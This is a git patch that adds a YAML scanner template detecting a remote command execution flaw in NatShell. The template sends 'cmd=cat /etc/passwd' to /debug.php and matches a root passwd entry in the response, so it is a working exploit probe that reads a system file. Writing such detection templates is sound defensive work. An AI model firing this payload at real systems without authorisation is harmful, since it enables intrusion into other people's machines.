From f1726d3a1f3dd7c4692d1cfa8be4d2800bf9641c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 27 May 2021 14:59:33 +0000 Subject: [PATCH] Create natshell-rce.yaml --- vulnerabilities/other/natshell-rce.yaml | 27 +++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 vulnerabilities/other/natshell-rce.yaml diff --git a/vulnerabilities/other/natshell-rce.yaml b/vulnerabilities/other/natshell-rce.yaml new file mode 100644 index 0000000000..e42942fb23 --- /dev/null +++ b/vulnerabilities/other/natshell-rce.yaml @@ -0,0 +1,27 @@ +id: natshell-rcce + +info: + name: NatShell Rce + author: pikpikcu + severity: high + reference: | + - https://twitter.com/sec715/status/1397924997457317897 + tags: natshell,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/debug.php" + body: | + cmd=cat /etc/passwd + + matchers-condition: and + matchers: + + - type: regex + regex: + - "toor:[x*]:0:0" + + - type: status + status: + - 200